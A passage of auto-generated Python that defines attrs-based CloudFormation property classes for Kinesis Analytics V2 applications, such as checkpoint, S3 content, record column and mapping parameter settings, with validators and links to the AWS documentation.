    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-configurationtype"""
    # Optional int property; may stay None.
    p_CheckpointInterval: int = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(int)),
        metadata={AttrMeta.PROPERTY_NAME: "CheckpointInterval"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-checkpointinterval"""
    # Optional bool property; may stay None.
    p_CheckpointingEnabled: bool = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(bool)),
        metadata={AttrMeta.PROPERTY_NAME: "CheckpointingEnabled"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-checkpointingenabled"""
    # Optional int property; may stay None.
    p_MinPauseBetweenCheckpoints: int = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(int)),
        metadata={AttrMeta.PROPERTY_NAME: "MinPauseBetweenCheckpoints"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-minpausebetweencheckpoints"""
@attr.s
class PropApplicationZeppelinMonitoringConfiguration(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. ``p_LogLevel`` is optional (its validator is wrapped in ``optional``
    and accepts None).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.ZeppelinMonitoringConfiguration"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinmonitoringconfiguration.html
    Property Document:
    - ``p_LogLevel``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinmonitoringconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinmonitoringconfiguration-loglevel
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.ZeppelinMonitoringConfiguration"
    # Optional string property; CloudFormation name "LogLevel".
    p_LogLevel: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
        metadata={AttrMeta.PROPERTY_NAME: "LogLevel"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinmonitoringconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinmonitoringconfiguration-loglevel"""
@attr.s
class PropApplicationS3ContentBaseLocation(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. Both attributes are required (``rp_`` prefix; validators are not
    wrapped in ``optional``, so the ``None`` defaults are rejected at init time).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.S3ContentBaseLocation"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentbaselocation.html
    Property Document:
    - ``rp_BasePath``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentbaselocation.html#cfn-kinesisanalyticsv2-application-s3contentbaselocation-basepath
    - ``rp_BucketARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentbaselocation.html#cfn-kinesisanalyticsv2-application-s3contentbaselocation-bucketarn
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.S3ContentBaseLocation"
    # Required string property; CloudFormation name "BasePath".
    rp_BasePath: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "BasePath"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentbaselocation.html#cfn-kinesisanalyticsv2-application-s3contentbaselocation-basepath"""
    # Required string property; CloudFormation name "BucketARN".
    rp_BucketARN: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "BucketARN"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentbaselocation.html#cfn-kinesisanalyticsv2-application-s3contentbaselocation-bucketarn"""
@attr.s
class PropApplicationInputLambdaProcessor(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. ``rp_ResourceARN`` is required (validator is not wrapped in
    ``optional``, so the ``None`` default is rejected at init time).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.InputLambdaProcessor"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputlambdaprocessor.html
    Property Document:
    - ``rp_ResourceARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputlambdaprocessor.html#cfn-kinesisanalyticsv2-application-inputlambdaprocessor-resourcearn
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.InputLambdaProcessor"
    # Required string property; CloudFormation name "ResourceARN".
    rp_ResourceARN: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "ResourceARN"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputlambdaprocessor.html#cfn-kinesisanalyticsv2-application-inputlambdaprocessor-resourcearn"""
@attr.s
class PropApplicationRecordColumn(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. ``rp_Name`` and ``rp_SqlType`` are required; ``p_Mapping`` is
    optional (its validator is wrapped in ``optional`` and accepts None).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.RecordColumn"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html
    Property Document:
    - ``rp_Name``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html#cfn-kinesisanalyticsv2-application-recordcolumn-name
    - ``rp_SqlType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html#cfn-kinesisanalyticsv2-application-recordcolumn-sqltype
    - ``p_Mapping``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html#cfn-kinesisanalyticsv2-application-recordcolumn-mapping
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.RecordColumn"
    # Required string property; CloudFormation name "Name".
    rp_Name: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "Name"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html#cfn-kinesisanalyticsv2-application-recordcolumn-name"""
    # Required string property; CloudFormation name "SqlType".
    rp_SqlType: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "SqlType"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html#cfn-kinesisanalyticsv2-application-recordcolumn-sqltype"""
    # Optional string property; may stay None.
    p_Mapping: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
        metadata={AttrMeta.PROPERTY_NAME: "Mapping"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html#cfn-kinesisanalyticsv2-application-recordcolumn-mapping"""
@attr.s
class PropApplicationCSVMappingParameters(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. Both attributes are required (``rp_`` prefix; validators are not
    wrapped in ``optional``, so the ``None`` defaults are rejected at init time).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.CSVMappingParameters"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-csvmappingparameters.html
    Property Document:
    - ``rp_RecordColumnDelimiter``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-csvmappingparameters.html#cfn-kinesisanalyticsv2-application-csvmappingparameters-recordcolumndelimiter
    - ``rp_RecordRowDelimiter``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-csvmappingparameters.html#cfn-kinesisanalyticsv2-application-csvmappingparameters-recordrowdelimiter
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.CSVMappingParameters"
    # Required string property; CloudFormation name "RecordColumnDelimiter".
    rp_RecordColumnDelimiter: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "RecordColumnDelimiter"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-csvmappingparameters.html#cfn-kinesisanalyticsv2-application-csvmappingparameters-recordcolumndelimiter"""
    # Required string property; CloudFormation name "RecordRowDelimiter".
    rp_RecordRowDelimiter: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "RecordRowDelimiter"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-csvmappingparameters.html#cfn-kinesisanalyticsv2-application-csvmappingparameters-recordrowdelimiter"""
@attr.s
class PropApplicationGlueDataCatalogConfiguration(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. ``p_DatabaseARN`` is optional (its validator is wrapped in
    ``optional`` and accepts None).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.GlueDataCatalogConfiguration"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-gluedatacatalogconfiguration.html
    Property Document:
    - ``p_DatabaseARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-gluedatacatalogconfiguration.html#cfn-kinesisanalyticsv2-application-gluedatacatalogconfiguration-databasearn
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.GlueDataCatalogConfiguration"
    # Optional string property; CloudFormation name "DatabaseARN".
    p_DatabaseARN: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
        metadata={AttrMeta.PROPERTY_NAME: "DatabaseARN"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-gluedatacatalogconfiguration.html#cfn-kinesisanalyticsv2-application-gluedatacatalogconfiguration-databasearn"""
@attr.s
class PropApplicationJSONMappingParameters(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. ``rp_RecordRowPath`` is required (validator is not wrapped in
    ``optional``, so the ``None`` default is rejected at init time).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.JSONMappingParameters"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-jsonmappingparameters.html
    Property Document:
    - ``rp_RecordRowPath``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-jsonmappingparameters.html#cfn-kinesisanalyticsv2-application-jsonmappingparameters-recordrowpath
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.JSONMappingParameters"
    # Required string property; CloudFormation name "RecordRowPath".
    rp_RecordRowPath: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "RecordRowPath"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-jsonmappingparameters.html#cfn-kinesisanalyticsv2-application-jsonmappingparameters-recordrowpath"""
@attr.s
class PropApplicationCodeContent(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. All attributes are optional (``p_`` prefix; validators are wrapped in
    ``optional`` and accept None).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.CodeContent"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html
    Property Document:
    - ``p_S3ContentLocation``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html#cfn-kinesisanalyticsv2-application-codecontent-s3contentlocation
    - ``p_TextContent``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html#cfn-kinesisanalyticsv2-application-codecontent-textcontent
    - ``p_ZipFileContent``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html#cfn-kinesisanalyticsv2-application-codecontent-zipfilecontent
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.CodeContent"
    # Optional nested property: accepts a PropApplicationS3ContentLocation
    # instance or a plain dict (coerced through ``from_dict`` before validation).
    p_S3ContentLocation: typing.Union['PropApplicationS3ContentLocation', dict] = attr.ib(
        default=None,
        converter=PropApplicationS3ContentLocation.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationS3ContentLocation)),
        metadata={AttrMeta.PROPERTY_NAME: "S3ContentLocation"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html#cfn-kinesisanalyticsv2-application-codecontent-s3contentlocation"""
    # Optional string property; may stay None.
    p_TextContent: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
        metadata={AttrMeta.PROPERTY_NAME: "TextContent"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html#cfn-kinesisanalyticsv2-application-codecontent-textcontent"""
    # Optional string property; may stay None.
    p_ZipFileContent: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
        metadata={AttrMeta.PROPERTY_NAME: "ZipFileContent"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html#cfn-kinesisanalyticsv2-application-codecontent-zipfilecontent"""
@attr.s
class PropApplicationReferenceDataSourceS3ReferenceDataSource(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. Both attributes are required (``rp_`` prefix; validators are not
    wrapped in ``optional``, so the ``None`` defaults are rejected at init time).

    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.S3ReferenceDataSource"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource.html
    Property Document:
    - ``rp_BucketARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource-bucketarn
    - ``rp_FileKey``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource-filekey
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.S3ReferenceDataSource"
    # Required string property; CloudFormation name "BucketARN".
    rp_BucketARN: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "BucketARN"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource-bucketarn"""
    # Required string property; CloudFormation name "FileKey".
    rp_FileKey: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "FileKey"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource-filekey"""
@attr.s
class PropApplicationEnvironmentProperties(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. ``p_PropertyGroups`` is optional and holds a list of nested property
    objects.

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.EnvironmentProperties"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-environmentproperties.html
    Property Document:
    - ``p_PropertyGroups``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-environmentproperties.html#cfn-kinesisanalyticsv2-application-environmentproperties-propertygroups
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.EnvironmentProperties"
    # Optional list property: each element may be a PropApplicationPropertyGroup
    # instance or a plain dict (the whole list is coerced via ``from_list``);
    # the deep_iterable validator then checks every element's type.
    p_PropertyGroups: typing.List[typing.Union['PropApplicationPropertyGroup', dict]] = attr.ib(
        default=None,
        converter=PropApplicationPropertyGroup.from_list,
        validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(PropApplicationPropertyGroup), iterable_validator=attr.validators.instance_of(list))),
        metadata={AttrMeta.PROPERTY_NAME: "PropertyGroups"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-environmentproperties.html#cfn-kinesisanalyticsv2-application-environmentproperties-propertygroups"""
@attr.s
class PropApplicationCatalogConfiguration(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. ``p_GlueDataCatalogConfiguration`` is optional (validator wrapped in
    ``optional``) and is a nested property object.

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.CatalogConfiguration"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-catalogconfiguration.html
    Property Document:
    - ``p_GlueDataCatalogConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-catalogconfiguration.html#cfn-kinesisanalyticsv2-application-catalogconfiguration-gluedatacatalogconfiguration
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.CatalogConfiguration"
    # Optional nested property: accepts an instance or a plain dict
    # (coerced through ``from_dict`` before validation).
    p_GlueDataCatalogConfiguration: typing.Union['PropApplicationGlueDataCatalogConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationGlueDataCatalogConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationGlueDataCatalogConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "GlueDataCatalogConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-catalogconfiguration.html#cfn-kinesisanalyticsv2-application-catalogconfiguration-gluedatacatalogconfiguration"""
@attr.s
class PropApplicationReferenceDataSourceCSVMappingParameters(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. Both attributes are required (``rp_`` prefix; validators are not
    wrapped in ``optional``, so the ``None`` defaults are rejected at init time).

    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.CSVMappingParameters"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters.html
    Property Document:
    - ``rp_RecordColumnDelimiter``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters-recordcolumndelimiter
    - ``rp_RecordRowDelimiter``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters-recordrowdelimiter
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.CSVMappingParameters"
    # Required string property; CloudFormation name "RecordColumnDelimiter".
    rp_RecordColumnDelimiter: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "RecordColumnDelimiter"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters-recordcolumndelimiter"""
    # Required string property; CloudFormation name "RecordRowDelimiter".
    rp_RecordRowDelimiter: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "RecordRowDelimiter"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters-recordrowdelimiter"""
@attr.s
class PropApplicationCustomArtifactConfiguration(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. ``rp_ArtifactType`` is required; the nested ``p_`` attributes are
    optional (validators wrapped in ``optional`` and accept None).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.CustomArtifactConfiguration"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html
    Property Document:
    - ``rp_ArtifactType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html#cfn-kinesisanalyticsv2-application-customartifactconfiguration-artifacttype
    - ``p_MavenReference``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html#cfn-kinesisanalyticsv2-application-customartifactconfiguration-mavenreference
    - ``p_S3ContentLocation``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html#cfn-kinesisanalyticsv2-application-customartifactconfiguration-s3contentlocation
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.CustomArtifactConfiguration"
    # Required string property; CloudFormation name "ArtifactType".
    rp_ArtifactType: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "ArtifactType"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html#cfn-kinesisanalyticsv2-application-customartifactconfiguration-artifacttype"""
    # Optional nested property: accepts an instance or a plain dict
    # (coerced through ``from_dict`` before validation).
    p_MavenReference: typing.Union['PropApplicationMavenReference', dict] = attr.ib(
        default=None,
        converter=PropApplicationMavenReference.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationMavenReference)),
        metadata={AttrMeta.PROPERTY_NAME: "MavenReference"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html#cfn-kinesisanalyticsv2-application-customartifactconfiguration-mavenreference"""
    # Optional nested property: accepts an instance or a plain dict
    # (coerced through ``from_dict`` before validation).
    p_S3ContentLocation: typing.Union['PropApplicationS3ContentLocation', dict] = attr.ib(
        default=None,
        converter=PropApplicationS3ContentLocation.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationS3ContentLocation)),
        metadata={AttrMeta.PROPERTY_NAME: "S3ContentLocation"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html#cfn-kinesisanalyticsv2-application-customartifactconfiguration-s3contentlocation"""
@attr.s
class PropApplicationDeployAsApplicationConfiguration(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. ``rp_S3ContentLocation`` is required (validator is not wrapped in
    ``optional``, so the ``None`` default is rejected at init time).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.DeployAsApplicationConfiguration"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-deployasapplicationconfiguration.html
    Property Document:
    - ``rp_S3ContentLocation``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-deployasapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-deployasapplicationconfiguration-s3contentlocation
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.DeployAsApplicationConfiguration"
    # Required nested property: accepts a PropApplicationS3ContentBaseLocation
    # instance or a plain dict (coerced through ``from_dict`` before validation).
    rp_S3ContentLocation: typing.Union['PropApplicationS3ContentBaseLocation', dict] = attr.ib(
        default=None,
        converter=PropApplicationS3ContentBaseLocation.from_dict,
        validator=attr.validators.instance_of(PropApplicationS3ContentBaseLocation),
        metadata={AttrMeta.PROPERTY_NAME: "S3ContentLocation"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-deployasapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-deployasapplicationconfiguration-s3contentlocation"""
@attr.s
class PropApplicationMappingParameters(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. Both attributes are optional nested property objects (``p_`` prefix;
    validators wrapped in ``optional`` and accept None).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.MappingParameters"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mappingparameters.html
    Property Document:
    - ``p_CSVMappingParameters``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mappingparameters.html#cfn-kinesisanalyticsv2-application-mappingparameters-csvmappingparameters
    - ``p_JSONMappingParameters``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mappingparameters.html#cfn-kinesisanalyticsv2-application-mappingparameters-jsonmappingparameters
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.MappingParameters"
    # Optional nested property: accepts an instance or a plain dict
    # (coerced through ``from_dict`` before validation).
    p_CSVMappingParameters: typing.Union['PropApplicationCSVMappingParameters', dict] = attr.ib(
        default=None,
        converter=PropApplicationCSVMappingParameters.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationCSVMappingParameters)),
        metadata={AttrMeta.PROPERTY_NAME: "CSVMappingParameters"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mappingparameters.html#cfn-kinesisanalyticsv2-application-mappingparameters-csvmappingparameters"""
    # Optional nested property: accepts an instance or a plain dict
    # (coerced through ``from_dict`` before validation).
    p_JSONMappingParameters: typing.Union['PropApplicationJSONMappingParameters', dict] = attr.ib(
        default=None,
        converter=PropApplicationJSONMappingParameters.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationJSONMappingParameters)),
        metadata={AttrMeta.PROPERTY_NAME: "JSONMappingParameters"},
    )
